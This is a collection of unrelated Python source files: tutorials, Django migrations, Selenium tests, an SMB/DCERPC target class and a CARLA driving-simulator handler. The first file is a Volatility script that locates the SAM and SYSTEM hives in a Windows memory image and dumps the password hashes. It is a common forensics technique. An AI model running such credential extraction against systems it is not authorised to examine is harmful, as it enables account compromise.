text stringlengths 38 1.54M |
|---|
import sys
import struct
memory_file = "WinXPSP2.vmem"
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
registry = RegistryApi(config)
registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x" % offset
if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x" % offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset
hashdump = HashDump(config)
for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets." |
#-------------------------------------------------------#
# Una clase es un constructor de objetos
#
# Class es la palabra reservada de Python para
# crear una clase.
#
# Las clases pueden contener variables, funciones
# y constructores.
#
# Las funciones y los constructores pueden estar
# sobrecargados.
#
# __init__ es el nombre especial para la función
# constructor.
#
# self es un parámetro especial que permite acceder
# al objeto mismo.
#-------------------------------------------------------#
from datetime import datetime
class Alumno:
nombre = ""
apellidos = ""
fechaNacimiento = ""
edad = 0
def __init__(self, nombre, apellidos) -> None:
self.nombre = nombre
self.apellidos = apellidos
def saluda(self) -> None:
print(f'Hola {self.nombre} {self.apellidos} !!!')
def setfechaNacimiento(self, fecha) -> None:
try:
if(len(fecha) == 8):
self.fechaNacimiento = datetime.strptime(
fecha, '%d-%m-%y').date()
else:
self.fechaNacimiento = datetime.strptime(
fecha, '%d-%m-%Y').date()
self.__calcularEdad()
except:
print("Formato incorrecto. [dd-mm-yyyy] || [dd-mm-yy] ")
def __calcularEdad(self):
self.edad = datetime.now().date().year - self.fechaNacimiento.year
def getFechaNacimiento(self) -> datetime:
return self.fechaNacimiento
def getEdad(self) -> int:
try:
if(self.edad == 0):
raise Exception("Debes incluir la fecha de nacimiento.")
else:
return self.edad
except Exception as e:
print(e)
def getNombre(self) -> str:
return self.nombre
def getApellidos(self) -> str:
return self.apellidos
alumno = Alumno("Pepito", "Pérez")
alumno.saluda()
alumno.setfechaNacimiento("26-07-92")
print(f"Edad: {alumno.getEdad()} años.")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-16 03:58
from __future__ import unicode_literals
from django.db import migrations, models
import webapp.models
class Migration(migrations.Migration):
dependencies = [
('webapp', '0003_auto_20171115_0851'),
]
operations = [
migrations.AddField(
model_name='opportunity',
name='location',
field=models.TextField(null=True),
),
migrations.AlterField(
model_name='organization',
name='organization_banner',
field=models.ImageField(default=None, upload_to=webapp.models.user_directory_path),
),
]
|
from GO4StructuralPatterns.FlyweightPattern.UnitFactory import UnitFactory
from GO4StructuralPatterns.FlyweightPattern.Target import Target
if __name__ == '__main__':
unit_factory = UnitFactory()
unit_tank_1 = Target()
unit_tank_1.unit = unit_factory.get_unit('tank')
unit_tank_2 = Target()
unit_tank_2.unit = unit_factory.get_unit('tank')
print(">>>>>>>>>>>> ID of Tanks")
print(unit_tank_1.id)
print(unit_tank_2.id)
print(">>>>>>>>>>>> Unit Details Of Tank")
print(unit_tank_1.unit)
print(unit_tank_2.unit)
|
"""Add and subtract"""
import cv2 as cv
import numpy as np
img = cv.imread('fish.jpg')
img = cv.resize(img, None, fx=0.5, fy=0.5, interpolation=cv.INTER_CUBIC)
M = np.ones(img.shape, dtype='uint8') * 40
brighter = cv.add(img, M)
darker = cv.subtract(img, M)
img2 = np.hstack([img, brighter, darker])
cv.imshow('window', img2)
cv.waitKey(0)
cv.destroyAllWindows() |
N = int(input())
wordlist= []
seclist = []
for i in range(N):
wordlist.append(input())
seclist.append(wordlist[i]*2)
existcnt = 0
for i in range(0, N):
cnt = 0
for j in range(0, N):
if (len(wordlist[i]) == len(seclist[j])/2) and (str(wordlist[i]) in str(seclist[j])):
seclist[j] = ''
cnt += 1
if cnt > 0:
existcnt += 1
print(existcnt)
# 맞았다!!! |
from enum import unique, Enum
@unique
class LambdaInvocationType(Enum):
RequestResponse = 1,
Event = 2
|
from rest_framework import serializers
from processes.models import Process,Process_User
from queues.serializers import QueueSerializer
class ProcessSerializer(serializers.ModelSerializer):
queues =QueueSerializer(many=True)
class Meta:
model=Process
fields='__all__'
class CreateProcessSerializer(serializers.ModelSerializer):
class Meta:
model=Process
fields='__all__'
class ProcessUserSerializer(serializers.ModelSerializer):
class Meta:
model=Process_User
fields=['process']
class CreateProcessUserSerializer(serializers.ModelSerializer):
class Meta:
model=Process_User
fields='__all__'
|
from sqlalchemy import or_
from lib.util_sqlalchemy import ResourceMixin
from app.extensions import db
class Table(ResourceMixin, db.Model):
__tablename__ = 'tables'
# Objects.
id = db.Column(db.Integer, primary_key=True)
table_id = db.Column(db.String(255), unique=False, index=True, nullable=True, server_default='')
table_name = db.Column(db.String(255), unique=False, index=True, nullable=True, server_default='')
# Relationships.
user_id = db.Column(db.Integer, db.ForeignKey('users.id', onupdate='CASCADE', ondelete='CASCADE'),
index=True, nullable=True, primary_key=False, unique=False)
base_id = db.Column(db.String(255), db.ForeignKey('bases.base_id', onupdate='CASCADE', ondelete='CASCADE'),
index=True, nullable=True, primary_key=False, unique=False)
def __init__(self, **kwargs):
# Call Flask-SQLAlchemy's constructor.
super(Table, self).__init__(**kwargs)
@classmethod
def find_by_id(cls, identity):
"""
Find an email by its message id.
:param identity: Email or username
:type identity: str
:return: User instance
"""
return Table.query.filter(
(Table.id == identity).first())
@classmethod
def search(cls, query):
"""
Search a resource by 1 or more fields.
:param query: Search query
:type query: str
:return: SQLAlchemy filter
"""
if not query:
return ''
search_query = '%{0}%'.format(query)
search_chain = (Table.id.ilike(search_query))
return or_(*search_chain)
@classmethod
def bulk_delete(cls, ids):
"""
Override the general bulk_delete method because we need to delete them
one at a time while also deleting them on Stripe.
:param ids: List of ids to be deleted
:type ids: list
:return: int
"""
delete_count = 0
for id in ids:
table = Table.query.get(id)
if table is None:
continue
table.delete()
delete_count += 1
return delete_count
|
import time
import pytest
import logging
from selenium import webdriver
from selenium.webdriver.support.events import EventFiringWebDriver, AbstractEventListener
from selenium.webdriver.common.keys import Keys
import json
from OpenCart.Drivers import get_driver_path
@pytest.fixture
def chrome_browser(request):
options = webdriver.ChromeOptions()
options.add_argument("start-maximized")
wd = EventFiringWebDriver(webdriver.Chrome(executable_path=get_driver_path()), MyListener())
request.addfinalizer(wd.quit)
return wd
class MyListener(AbstractEventListener):
def before_find(self, by, value, driver):
logging.log(1, msg="Hello, Before find!")
print(by, value)
def after_find(self, by, value, driver):
pass
#print(by, value, "found")
def on_exception(self, exception, driver):
# pass
driver.save_screenshot('screenshots/exception.png')
#print(exception)
def test_logging(chrome_browser):
chrome_browser.get('https://habr.com/ru/company/skyeng/blog/465291/')
find_button = chrome_browser.find_element_by_id('.search-form-btn12345')
find_button.click()
find_field = chrome_browser.find_element_by_id('search-form-field')
find_field.send_keys('Otus')
logging.log(1, 'opened list of posts')
# find_field.send_keys(Keys.ENTER)
chrome_browser.save_screenshot('screenshots/finish_test.png')
|
import copy
from typing import List
from aiosmb.dcerpc.v5.common.connection.connectionstring import DCERPCStringBinding
from asysocks.unicomm.common.proxy import UniProxyTarget
from asysocks.unicomm.common.target import UniTarget, UniProto
class DCERPCTarget(UniTarget):
def __init__(self, connection_string:str, ip, port, protocol, rpcprotocol, proxies = None, timeout = 1, hostname = None, domain = None, dc_ip = None, smb_connection = None, pipe=None):
self.connection_string = connection_string
self.rpcprotocol = rpcprotocol
self.pipe = pipe
self.smb_connection = smb_connection #storing the smb connection if already exists...
UniTarget.__init__(self, ip, port, protocol, timeout, hostname = hostname, proxies = proxies, domain = domain, dc_ip = dc_ip)
def get_hostname_or_ip(self):
if self.smb_connection is not None:
return self.smb_connection.target.get_hostname_or_ip()
if self.hostname is None:
return self.ip
return self.hostname
def get_ip_or_hostname(self):
if self.smb_connection is not None:
return self.smb_connection.target.get_ip_or_hostname()
if self.ip is None:
return self.hostname
return self.ip
#def to_target_string(self) -> str:
# if self.hostname is None:
# raise Exception('Hostname is None!')
# if self.domain is None:
# raise Exception('Domain is None!')
# return 'cifs/%s@%s' % (self.hostname, self.domain)
def to_target_string(self) -> str:
if self.smb_connection is not None:
return self.smb_connection.target.to_target_string()
return 'cifs/%s@%s' % (self.hostname, self.domain)
@staticmethod
def from_smbconnection(smb_connection, pipe = None):
if pipe is None:
target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
else:
target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), pipe, smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
return target
@staticmethod
def from_connection_string(s, smb_connection = None, timeout = 1, proxies:List[UniProxyTarget] = None, dc_ip:str = None, domain:str = None, hostname:str = None):
if isinstance(s, str):
connection_string = DCERPCStringBinding(s)
elif isinstance(s, DCERPCStringBinding):
connection_string = s
else:
raise Exception('Unknown string binding type %s' % type(s))
if domain is None and smb_connection is not None:
domain = smb_connection.target.domain
na = connection_string.get_network_address()
ps = connection_string.get_protocol_sequence()
if ps == 'ncadg_ip_udp':
raise Exception('DCERPC UDP not implemented')
port = connection_string.get_endpoint()
target = DCERPCUDPTarget(connection_string, na, int(port), timeout = timeout)
elif ps == 'ncacn_ip_tcp':
port = connection_string.get_endpoint()
target = DCERPCTCPTarget(connection_string, na, port, timeout = timeout, dc_ip=dc_ip, domain = domain, hostname = hostname)
elif ps == 'ncacn_http':
raise Exception('DCERPC HTTP not implemented')
target = DCERPCHTTPTarget(connection_string, na, int(port), timeout = timeout)
elif ps == 'ncacn_np':
named_pipe = connection_string.get_endpoint()
if named_pipe:
named_pipe = named_pipe[len(r'\pipe'):]
target = DCERPCSMBTarget(connection_string, na, pipe=named_pipe, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
else:
target = DCERPCSMBTarget(connection_string, na, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
elif ps == 'ncalocal':
raise Exception('DCERPC LOCAL not implemented')
target = DCERPCLocalTarget(connection_string, na, int(port), timeout = timeout)
else:
raise Exception('Unknown DCERPC protocol %s' % ps)
if proxies is not None:
target.proxies = copy.deepcopy(proxies)
if smb_connection is not None:
if smb_connection.target.proxies is not None:
target.proxies = copy.deepcopy(smb_connection.target.proxies)
return target
def __str__(self):
t = '==== DCERPCTarget ====\r\n'
for k in self.__dict__:
t += '%s: %s\r\n' % (k, self.__dict__[k])
return t
def __hash__(self):
return hash(str(self.connection_string) + str(self.rpcprotocol) + str(self.pipe) +\
str(self.ip) + str(self.port) + str(self.protocol) + str(self.timeout) +\
str(self.hostname) + str(self.domain) + str(self.dc_ip))
def __eq__(self, other):
if not isinstance(other, DCERPCTarget):
return False
return self.__hash__() == other.__hash__()
class DCERPCTCPTarget(DCERPCTarget):
def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
DCERPCTarget.__init__(
self,
connection_string,
ip,
int(port),
UniProto.CLIENT_TCP,
'ncacn_ip_tcp',
proxies = proxies,
timeout = timeout,
hostname = hostname,
domain = domain,
dc_ip = dc_ip
)
class DCERPCUDPTarget(DCERPCTarget):
def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
DCERPCTarget.__init__(
self,
connection_string,
ip,
int(port),
UniProto.CLIENT_UDP,
'ncadg_ip_udp',
proxies = proxies,
timeout = timeout,
hostname = hostname,
domain = domain,
dc_ip = dc_ip
)
class DCERPCSMBTarget(DCERPCTarget):
def __init__(self, connection_string, ip, pipe = None, smb_connection = None, timeout = 1, hostname = None):
DCERPCTarget.__init__(
self,
connection_string,
ip,
None,
UniProto.CLIENT_TCP,
'ncacn_np',
proxies = smb_connection.target.proxies,
timeout = timeout,
hostname = hostname,
domain = smb_connection.target.domain,
dc_ip = smb_connection.target.dc_ip,
smb_connection = smb_connection,
pipe = pipe
)
class DCERPCHTTPTarget(DCERPCTarget):
def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, domain = None, dc_ip = None, hostname = None):
DCERPCTarget.__init__(
self,
connection_string,
ip,
port,
UniProto.CLIENT_TCP,
'ncacn_http',
proxies = proxies,
timeout = timeout,
hostname = hostname,
domain = domain,
dc_ip = dc_ip
)
self.set_hostname_or_ip(ip)
self.port = int(port)
class DCERPCLocalTarget(DCERPCTarget):
def __init__(self, connection_string, ip, port, timeout = 1, hostname = None):
raise NotImplementedError()
DCERPCTarget.__init__(self, connection_string, DCERPCTargetType.LOCAL, timeout = timeout)
self.set_hostname_or_ip(ip)
self.port = int(port)
self.rpcprotocol = 'ncalocal'
if __name__ == '__main__':
s = ''
target = DCERPCTarget.from_connection_string(s)
|
# ~~~~parameters~~~~~
# the src file with answer
test_file = '/home/vistajin/Desktop/test-001.txt'
flag = False
with open(test_file, 'r', encoding='UTF-8') as f:
all_content = f.readlines()
for line in all_content:
if line.startswith("*Question"):
flag = True
print("===================================")
line = line.replace("*", "")
elif line.find("Answer: ") != -1:
if flag:
print("Answer: ")
flag = False
if flag:
print(line.strip())
|
user_input = int(input('Введите первое число: '))
user_input2 = int(input('Введите второе число: '))
result = user_input + user_input2
result2 = user_input * user_input2
if result < 1000:
print(f'Сумма {user_input} и {user_input2} = {result}')
else:
print (f'Произведение {user_input} и {user_input2} = {result2}')
|
import math
import sys
from os import rename
import requests
print("This is a test")
r = requests.get(
"https://www.google.com/webhp?hl=en&sa=X&ved=0ahUKEwjh2rWO5o3oAhUtxosKHdW6AigQPAgH"
)
print(r.ok)
print(r.status_code)
a = "asdas"
|
s = float(input('Qual o salário do funcionário? R$ '))
if s > 1250.00:
print('Quem ganhava R$ \33[33m{:.2f}\33[m, passa a ganhar R$ \33[36m{:.2f}\33[m agora.'.format(s, (s * 1.10)))
elif s <= 1250.00:
print('Quem ganhava R$ \33[33m{:.2f}\33[m, passa a ganhar R$ \33[31m{:.2f}\33[m agora.'.format(s, (s * 1.15))) |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oilstandart', '0016_auto_20170913_1430'),
]
operations = [
migrations.AlterField(
model_name='contacts',
name='mail_1',
field=models.CharField(verbose_name='email №1(обязательное поле)', max_length=200, null=True, blank=True),
),
]
|
import urllib3
url = "http://www.baidu.com"
http = urllib3.PoolManager() # type: urllib3.poolmanager.PoolManager
print(http.__class__)
response1 = http.urlopen('GET', url) # type: urllib3.response.HTTPResponse
print("####### 方法1 #######")
# 获取状态码,200表示成功
print(response1.status)
# 获取网页内容的长度
print(response1.version)
print("####### 方法2 #######")
response2 = http.request('GET', url) # type: urllib3.response.HTTPResponse
from urllib import parse
# url转码操作,只有转码后浏览器才会识别该url
kw = {'name': '中国'}
res = parse.urlencode(kw)
print(res)
res2 = parse.unquote(res)
print(res2)
# 结果如下:
# name=E5%B0%8F%E5%8F%AF
# name=中国
|
# WHY ARE THERE NO ++ AND -- OPERATORS IN PYTHON?
'''
Simple increment and decrement aren't needed as much as in other languages.
You don't write things like for(int i = 0; i < 10; ++i) in Python very often;
instead you do things like for i in range(0, 10)
More in the following link:
http://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python
'''
# PYTHON'S NULL EQUIVALENT: None
'''
http://pythoncentral.io/python-null-equivalent-none/
assign the None type to a variable
my_none_variable = None
database_connection = database.connect()
if database_connection is None:
print('The database could not connect')
else:
print('The database could connect')
It is preferable to use "is None" rather than "== None" to check if a variable is None
it's always advisable to use the is keyword to check if two variables are exactly the same
''' |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from maths.math_lib import int_nthroot
def isprimepower(n: int):
x = n
power = 1
while x >= 2:
power += 1
x = int_nthroot(n, power)
if x ** power == n:
return x, power
return n, 1 |
# 최대값을 만들기 위해서 곱하기 또는 더하기를 선택해야 하는데
# 0, 1이 피연산자인 경우에는 곱하기보다 더하기를 선택하는 것이 맞다.
nums = list(map(int, input()))
result = nums[0]
for i in range(1, len(nums)):
if nums[i] <= 1 or result <= 1:
result += nums[i]
else:
result *= nums[i]
print(result)
|
#!/usr/bin/env python
""" Implementation of the CarlaHandler class. CarlaHandler class provides some custom built APIs for Carla. """
__author__ = "Mayank Singal"
__maintainer__ = "Mayank Singal"
__email__ = "mayanksi@andrew.cmu.edu"
__version__ = "0.1"
import random
import time
import math
import numpy as np
import carla
from utils import get_matrix, create_bb_points
from enum import Enum
import re
class RoadOption(Enum):
"""
RoadOption represents the possible topological configurations when moving from a segment of lane to other.
"""
VOID = -1
LEFT = 1
RIGHT = 2
STRAIGHT = 3
LANEFOLLOW = 4
CHANGELANELEFT = 5
CHANGELANERIGHT = 6
def find_weather_presets():
rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')
name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))
presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]
return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]
class CarlaHandler:
def __init__(self, client):
self.client = client # TODO: Is this needed?
self.world = client.get_world()
self.world_map = self.world.get_map()
self.all_waypoints = self.get_waypoints()
self.blueprint_library = self.world.get_blueprint_library()
self.actor_dict = {}
self.world.set_weather(find_weather_presets()[2][0])
print("Handler Initialized!\n")
def __del__(self):
self.destroy_actors()
print("Handler destroyed..\n")
def destroy_actors(self):
for actor in self.world.get_actors():
if actor.id in self.actor_dict:
actor.destroy()
print("All actors destroyed..\n")
def get_spawn_points(self):
return self.world_map.get_spawn_points()
def spawn_vehicle(self, vehicle_type = 'model3', spawn_point=None):
if(spawn_point == None):
spawn_point = random.choice(self.get_spawn_points())
vehicle_blueprint = self.blueprint_library.filter(vehicle_type)[0]
vehicle = self.world.spawn_actor(vehicle_blueprint, spawn_point)
self.actor_dict[vehicle.id] = vehicle
print("Vehicle spawned at", spawn_point, "with ID:", vehicle.id, "\n")
return vehicle, vehicle.id
def get_waypoints(self, distance=1):
return self.world_map.generate_waypoints(distance=distance)
def filter_waypoints(self, waypoints, road_id=None, lane_id=None):
filtered_waypoints = []
for waypoint in waypoints:
if(lane_id == None):
if(waypoint.road_id == road_id):
filtered_waypoints.append(waypoint)
else:
if(waypoint.road_id == road_id and waypoint.lane_id == lane_id):
filtered_waypoints.append(waypoint)
return filtered_waypoints
def draw_waypoints(self, waypoints, road_id=None, section_id=None, life_time=50.0, color=False):
if(color):
b = 255
else:
b = 0
for waypoint in waypoints:
if(waypoint.road_id == road_id or road_id==None):
self.world.debug.draw_string(waypoint.transform.location, 'O', draw_shadow=False,
color=carla.Color(r=0, g=255, b=b), life_time=life_time,
persistent_lines=True)
if(waypoint.section_id == section_id):
self.world.debug.draw_string(waypoint.transform.location, 'O', draw_shadow=False,
color=carla.Color(r=0, g=255, b=b), life_time=life_time,
persistent_lines=True)
def draw_arrow(self, waypoints, road_id=None, section_id=None, life_time=50.0):
for i,waypoint in enumerate(waypoints):
if(i == len(waypoints)-1):
continue
trans = waypoints[i+1].transform
#yaw_in_rad = math.radians(trans.rotation.yaw)
yaw_in_rad = math.radians(np.arctan(waypoint.transform.location.y - trans.location.y)/(waypoint.transform.location.x - trans.location.x))
#pitch_in_rad = math.radians(trans.rotation.pitch)
p1 = carla.Location(
x=trans.location.x + math.cos(yaw_in_rad),
y=trans.location.y + math.sin(yaw_in_rad),
z=trans.location.z)
if(road_id == None or waypoint.road_id == road_id):
self.world.debug.draw_arrow(waypoint.transform.location, p1, thickness = 0.01, arrow_size=0.05,
color=carla.Color(r=0, g=255, b=0), life_time=life_time)
def _retrieve_options(self, list_waypoints, current_waypoint):
"""
Compute the type of connection between the current active waypoint and the multiple waypoints present in
list_waypoints. The result is encoded as a list of RoadOption enums.
:param list_waypoints: list with the possible target waypoints in case of multiple options
:param current_waypoint: current active waypoint
:return: list of RoadOption enums representing the type of connection from the active waypoint to each
candidate in list_waypoints
"""
options = []
for next_waypoint in list_waypoints:
# this is needed because something we are linking to
# the beggining of an intersection, therefore the
# variation in angle is small
next_next_waypoint = next_waypoint.next(3.0)[0]
link = self._compute_connection(current_waypoint, next_next_waypoint)
options.append(link)
return options
def _compute_connection(self, current_waypoint, next_waypoint, threshold=10):
"""
Compute the type of topological connection between an active waypoint (current_waypoint) and a target waypoint
(next_waypoint).
:param current_waypoint: active waypoint
:param next_waypoint: target waypoint
:return: the type of topological connection encoded as a RoadOption enum:
RoadOption.STRAIGHT
RoadOption.LEFT
RoadOption.RIGHT
"""
n = next_waypoint.transform.rotation.yaw
n = n % 360.0
c = current_waypoint.transform.rotation.yaw
c = c % 360.0
diff_angle = (n - c) % 180.0
if diff_angle < threshold or diff_angle > (180 - threshold):
return RoadOption.STRAIGHT
elif diff_angle > 90.0:
return RoadOption.LEFT
else:
return RoadOption.RIGHT
def move_vehicle(self, vehicle_id=None, control=None):
if(vehicle_id==None or control==None):
print("Invalid vechicle motion parameters.")
else:
if(self.actor_dict[vehicle_id]==None):
print("Actor with given ID does not exist")
else:
vehicle = self.actor_dict[vehicle_id]
vehicle.apply_control(control)
def convert_global_transform_to_actor_frame(self, actor=None, transform=None):
if(actor == None or transform == None):
print("Input is None. Please Check")
return None
else:
actor_to_world_transform = actor.get_transform()
R_actor_to_world = get_matrix(actor_to_world_transform)
R_world_to_actor = np.linalg.inv(R_actor_to_world)
transform_coords = np.zeros((4, 1))
transform_coords[0] = transform.location.x
transform_coords[1] = transform.location.y
transform_coords[2] = transform.location.z
transform_coords[3] = 1
transform_position_as_seen_from_actor = np.dot(R_world_to_actor, transform_coords)
return transform_position_as_seen_from_actor
def get_pedestrian_information(self, ego_vehicle=None):
pedestrian_list = []
ego_vehicle_location = ego_vehicle.get_location()
nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
# Get current road and lane IDs
current_road_ID = nearest_waypoint.road_id
for actor in self.world.get_actors().filter('walker.*'):
actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
if(actor_nearest_waypoint.road_id == current_road_ID):
pedestrian_list.append(actor)
return pedestrian_list
def get_next_waypoints(self, last_waypoint, ego_speed, rev=False, k=100):
if(last_waypoint == None):
return []
sampling_radius = 1#ego_speed * 1 / 3.6
full_waypoints = []
for i in range(k):
if(rev == False):
next_waypoints = last_waypoint.next(sampling_radius)
else:
next_waypoints = last_waypoint.previous(sampling_radius)
if len(next_waypoints) == 0:
break
elif len(next_waypoints) == 1:
# only one option available ==> lanefollowing
next_waypoint = next_waypoints[0]
road_option = RoadOption.LANEFOLLOW
else:
# random choice between the possible options
road_options_list = self._retrieve_options(
next_waypoints, last_waypoint)
road_option = random.choice(road_options_list)
if RoadOption.STRAIGHT in road_options_list:
next_waypoint = next_waypoints[road_options_list.index(RoadOption.STRAIGHT)]
else:
next_waypoint = next_waypoints[road_options_list.index(road_option)]
full_waypoints.append(next_waypoint)
# curr_waypoint = next_waypoints[-1]
last_waypoint = next_waypoint
return full_waypoints
def get_state_information_new(self, ego_vehicle=None, original_lane_ID=None,):
if(ego_vehicle==None):
print("No ego vehicle specified..")
return None
else:
# Get ego vehicle location and nearest waypoint for reference.
ego_vehicle_location = ego_vehicle.get_location()
nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
ego_speed = np.sqrt(ego_vehicle.get_velocity().x**2 + ego_vehicle.get_velocity().y**2 + ego_vehicle.get_velocity().z**2) * 3.6
current_lane_waypoints = self.get_next_waypoints(nearest_waypoint, ego_speed, k=300)[::-1]
left_lane_waypoints = self.get_next_waypoints(nearest_waypoint.get_left_lane(), ego_speed, k=300)[::-1] #+
right_lane_waypoints = self.get_next_waypoints(nearest_waypoint.get_right_lane(), ego_speed, k=300)[::-1] #+
# self.draw_waypoints(current_lane_waypoints, life_time=5)
# self.draw_waypoints(left_lane_waypoints, life_time=5, color=True)
left_lane_ids = list(set([wp.lane_id for wp in left_lane_waypoints]))
current_lane_ids = list(set([wp.lane_id for wp in current_lane_waypoints]))
right_lane_ids = list(set([wp.lane_id for wp in right_lane_waypoints]))
# Containers for actors in current, left and right lanes
actors_in_current_lane = []
actors_in_left_lane = []
actors_in_right_lane = []
# Containers for leading and rear vehicle in current lane
front_vehicle = None
rear_vehicle = None
closest_distance_front = 10000000000 #TODO Change this to more formal value
closest_distance_rear = -10000000000 #TODO Change this to more formal value
for actor in self.world.get_actors().filter('vehicle.*'):
# For all actors that are not ego vehicle
if(actor.id != ego_vehicle.id):
actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
if(actor_nearest_waypoint.lane_id in left_lane_ids):
actors_in_left_lane.append(actor)
elif(actor_nearest_waypoint.lane_id in right_lane_ids):
actors_in_right_lane.append(actor)
else:
actors_in_current_lane.append(actor)
curr_actor_location_in_ego_vehicle_frame = self.convert_global_transform_to_actor_frame(actor=ego_vehicle, transform=actor.get_transform())
if(curr_actor_location_in_ego_vehicle_frame[0][0] > 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] < closest_distance_front):
front_vehicle = actor
closest_distance_front = curr_actor_location_in_ego_vehicle_frame[0][0]
elif(curr_actor_location_in_ego_vehicle_frame[0][0] < 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] > closest_distance_rear):
rear_vehicle = actor
closest_distance_rear = curr_actor_location_in_ego_vehicle_frame[0][0]
return current_lane_waypoints, left_lane_waypoints, right_lane_waypoints, front_vehicle, rear_vehicle, actors_in_current_lane, actors_in_left_lane, actors_in_right_lane
def get_state_information(self, ego_vehicle=None, original_lane_ID=None):
# Check for valid inputs
if(ego_vehicle==None):
print("No ego vehicle specified..")
return None
else:
# Get ego vehicle location and nearest waypoint for reference.
ego_vehicle_location = ego_vehicle.get_location()
nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
# Get current road and lane IDs
current_road_ID = nearest_waypoint.road_id
#print("Spawn Road ID Inside Handler:", current_road_ID)
current_lane_ID = nearest_waypoint.lane_id
if(original_lane_ID is not None):
current_lane_ID = original_lane_ID
if(original_lane_ID is not None):
if(original_lane_ID < 0):
left_lane_ID = current_lane_ID+1
right_lane_ID = current_lane_ID-1
else:
left_lane_ID = current_lane_ID-1
right_lane_ID = current_lane_ID+1
# Get IDs of left and right lanes
else:
left_lane_ID = nearest_waypoint.get_left_lane().lane_id
right_lane_ID = nearest_waypoint.get_right_lane().lane_id
# Finding waypoints in current, left and right lanes
current_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=current_lane_ID)
left_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=left_lane_ID)
right_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=right_lane_ID)
# Containers for leading and rear vehicle in current lane
front_vehicle = None
rear_vehicle = None
closest_distance_front = 10000000000 #TODO Change this to more formal value
closest_distance_rear = -10000000000 #TODO Change this to more formal value
# Containers for actors in current, left and right lanes
actors_in_current_lane = []
actors_in_left_lane = []
actors_in_right_lane = []
# Fill containers defined above
for actor in self.world.get_actors().filter('vehicle.*'):
# For all actors that are not ego vehicle
if(actor.id != ego_vehicle.id):
# Find nearest waypoint on the map
actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
# If actor is on the same road as the ego vehicle
if(actor_nearest_waypoint.road_id == current_road_ID):
#print(actor_nearest_waypoint.road_id, actor_nearest_waypoint.lane_id, "OLA")
# If actor is on the same lane as the ego vehicle: Add to relevant container, and find if it's the leading or trailing vehicle
if(actor_nearest_waypoint.lane_id == current_lane_ID):
actors_in_current_lane.append(actor)
curr_actor_location_in_ego_vehicle_frame = self.convert_global_transform_to_actor_frame(actor=ego_vehicle, transform=actor.get_transform())
if(curr_actor_location_in_ego_vehicle_frame[0][0] > 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] < closest_distance_front):
front_vehicle = actor
closest_distance_front = curr_actor_location_in_ego_vehicle_frame[0][0]
elif(curr_actor_location_in_ego_vehicle_frame[0][0] < 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] > closest_distance_rear):
rear_vehicle = actor
closest_distance_rear = curr_actor_location_in_ego_vehicle_frame[0][0]
# Add to relevant container
elif(actor_nearest_waypoint.lane_id == left_lane_ID):
actors_in_left_lane.append(actor)
# Add to relevant container
elif(actor_nearest_waypoint.lane_id == right_lane_ID):
actors_in_right_lane.append(actor)
return current_lane_waypoints, left_lane_waypoints, right_lane_waypoints, front_vehicle, rear_vehicle, actors_in_current_lane, actors_in_left_lane, actors_in_right_lane
|
import re
# 匹配.com或.cn后缀的URL网址
pattern = "[a-zA-Z]+:// [^\s]*[.com|.cn]"
string = "<a href='http:// www.baidu.com'>百度首页</a>"
print(re.search(pattern, string))
# 匹配电话号码
pattern = "\d{4}-\d{7}|\d{3}-\d{8}"
string = "021-6728263653682382265236"
print(re.search(pattern, string))
# 匹配电子邮件地址
pattern = "\w+([.+-]\w+)*@\w+([.-]\w+)*\.\w+([.-]\w+)*" # 匹配电子邮件的正则表达式
string="<a href='http:// www.baidu.com'>百度首页</a><br><a href='mailto:c-e+o@iqi-anyue.com.cn'>电子邮件地址</a>"
print(re.search(pattern,string))
|
